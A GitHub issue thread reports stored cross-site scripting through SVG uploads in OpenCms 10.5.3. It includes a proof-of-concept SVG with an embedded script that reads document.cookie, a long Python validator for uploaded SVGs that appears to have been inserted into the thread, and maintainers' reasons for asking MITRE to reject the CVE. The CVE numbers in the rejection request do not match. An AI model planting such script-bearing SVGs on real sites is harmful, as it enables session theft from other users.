
Stored Cross Site Scripting via SVG image upload in Gallery Functionality #587

Closed
MrR3boot opened this issue Mar 20, 2018 · 13 comments

@MrR3boot

Dear Team, I would like to report a persistent XSS vulnerability in the latest release. Mitre.org assigned a CVE ID for this.

Description:

Cross Site Scripting (XSS) Vulnerability in the Gallery functionality in OpenCMS 10.5.3 allows remote attackers to execute arbitrary web script via a crafted SVG image.

Steps to Reproduce:

  1. Log in as a user who has the Gallery Editor role.
  2. Navigate to the gallery and upload the SVG file below.

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <!-- Runs when the SVG is opened as a document (the direct image link); browsers do not run it when the file is embedded via <img> -->
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
```

  3. Once another user who has Root Administrator permissions visits the image link or views the uploaded SVG image, the script gets executed.

Fix:

Input file validation

Affected Version:

10.5.3 (latest release)

@MrR3boot
Author

Any update?

@tHerrmann

Hi, we are currently discussing whether this issue is relevant. As users with roles lower than Root Administrator are able to edit HTML source code, they are allowed to add script tags to pages anyway. No need to use any SVG for that.
OpenCms is used to maintain any kind of web site, so it is required that users are able to add JavaScript to the generated pages.

@MrR3boot
Author

OK. I'll agree with you.

@aKandzior
Member

We take this issue very seriously! However, we have to find a way to strike a balance so that users can still use this SVG feature if they need it, while at the same time preventing users (who have an editor account on the system) from uploading "malicious" content.

@MrR3boot
Author

Absolutely right. Implementing validation on the uploaded SVG content will reduce the risk. Try to avoid accepting SVG uploads that contain malicious script tags, or perform additional checks while displaying the SVG content back in the application.
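The "Input file validation" fix proposed in the report and the suggestion above (refuse SVGs that carry script tags, or check them before they are displayed) come down to the same server-side filter. What follows is an added example written for this page; it is not code from OpenCms or from any participant in the thread. The forbidden-element list, the URL-scheme list and the sample documents other than the reporter's PoC are my own assumptions and constructions. The validator parses the upload as XML and reports every construct that would execute when the file is opened as a document in a browser: `<script>`, `on*` event-handler attributes, `javascript:` URLs in any attribute, `<foreignObject>` (which embeds arbitrary HTML), and internal DTD entity declarations.

```python
"""Validate an uploaded SVG for active content before it is stored or served.

Added example for this issue, not OpenCms code. It shows the "input file
validation" the report asks for: the upload is parsed as XML and rejected when
it contains anything a browser would execute on opening the file as a document.
"""
import xml.etree.ElementTree as ET

# Assumed policy (not taken from the issue): elements that execute or embed
# active content, and URL schemes that run script when navigated to.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def _local(qname):
    """'{http://www.w3.org/2000/svg}script' -> 'script'; plain names pass through."""
    return qname.rsplit("}", 1)[-1].lower()


def _normalise_url(value):
    """Mimic browser URL pre-processing before scheme detection: strip leading
    C0 controls and spaces, remove embedded tab/CR/LF, lower-case."""
    i = 0
    while i < len(value) and ord(value[i]) <= 0x20:
        i += 1
    return value[i:].replace("\t", "").replace("\r", "").replace("\n", "").lower()


def validate_svg(data):
    """Return a list of findings; an empty list means the upload passed.

    `data` is the raw upload as bytes (or str). A file the XML parser cannot
    handle is reported as a finding rather than silently accepted.
    """
    raw = data if isinstance(data, bytes) else data.encode("utf-8")

    # An internal DTD subset can declare entities (entity-expansion blowup, and
    # local file reads in parsers that resolve external entities). The external
    # DOCTYPE reference in the PoC is left alone: expat does not fetch it.
    if b"<!ENTITY" in raw:
        return ["entity declaration in DOCTYPE"]

    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")

    for el in root.iter():                     # root.iter() includes root itself
        name = _local(el.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{name}>")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            # Every SVG event-handler attribute is on* (onload, onclick, onbegin, ...).
            # Lower-cased because the same file may later be inlined into HTML,
            # where attribute names are case-insensitive.
            if aname.startswith("on"):
                findings.append(f"event handler attribute {aname} on <{name}>")
            # Checked on every attribute, not only href: <set attributeName="href"
            # to="javascript:..."> writes such a value into an <a> at runtime.
            if _normalise_url(value).startswith(SCRIPT_SCHEMES):
                findings.append(f"script URL in {aname} on <{name}>")
    return findings


# Constructed inputs. POC_SVG is the file from the report; the others are mine.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="1" height="1"/></svg>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href=" JavaScript:alert(1)"><text>click</text></a></svg>')
ENTITY_SVG = b'<!DOCTYPE svg [<!ENTITY a "aaaa">]><svg xmlns="http://www.w3.org/2000/svg">&a;</svg>'

if __name__ == "__main__":
    for label, doc in [("poc", POC_SVG), ("benign", BENIGN_SVG), ("handler", HANDLER_SVG),
                       ("href", HREF_SVG), ("entity", ENTITY_SVG)]:
        print(f"{label:8} {validate_svg(doc) or 'OK'}")
```

Two points worth keeping in mind when deploying a check like this. First, the script in the reporter's file only runs when the SVG is navigated to as a document (the "image link" in the report); a browser rendering the same file through an `<img>` element or as a CSS background never executes it, so the exposure is the direct URL of the stored resource. Second, a filter on upload is one layer; serving user uploads from a separate origin, or with a `Content-Security-Policy` response header that grants no script source and `X-Content-Type-Options: nosniff`, neutralises an inline script in an SVG opened as a document even if a later bypass of the filter is found. Those serving-side options are my suggestion here, not something the thread describes OpenCms as doing.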

@MrR3boot
Author

Hi, can I get an exact ETA for this fix?

@aKandzior
Member

We are still considering the best way to proceed here. We normally do not like to modify content uploaded by registered users. Perhaps the better option is to allow only “trusted” users to upload content anyway.

@tHerrmann

We decided to refrain from changing the handling of SVG images. OpenCms administrators have the option to assign the right to upload resources to trusted users only. The same way, they may allow trusted users to add JavaScript directly to a page.

@tHerrmann

No, that is not related. This issue concerns SVG files uploaded into OpenCms by registered users.
The TinyMCE issue relates to SVG data pasted into the TinyMCE source code editor as a data URL.

@NicoleG25

@aKandzior was this issue ever addressed? And if so, could you kindly point out where it was fixed?

Cheers !

@aKandzior
Member

Please see the comment from @tHerrmann dated Sep. 25 2018 above.

@NicoleG25

@aKandzior understood.
Do you plan to contact MITRE to reject the CVE assigned to this vulnerability?

@aKandzior
Member

I have submitted a request for rejection to MITRE with the following description:

CVE-2018-8811 is linked to https://www.exploit-db.com/exploits/44392
Both entries point to each other as sources.
The only external source is the GitHub issue description
#587.

Rationale for rejection:
OpenCms, the product in question, is a web CMS system.
It allows only registered (!) users to upload different kinds of content artifacts (SVG, .doc, .docx, etc.).

The uploaded content is stored in the CMS content repository "as is".
In case of scripts inside an SVG, this may or may not be "malicious", there is no way of knowing if the uploaded SVG contains the script for a reason.

It should be pointed out that to exploit the "issue", a user must have an account (!) in the CMS as a content manager. Moreover, uploads and other changes in the CMS content repository are logged with the user name / id.

https://www.exploit-db.com/exploits/44392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8815
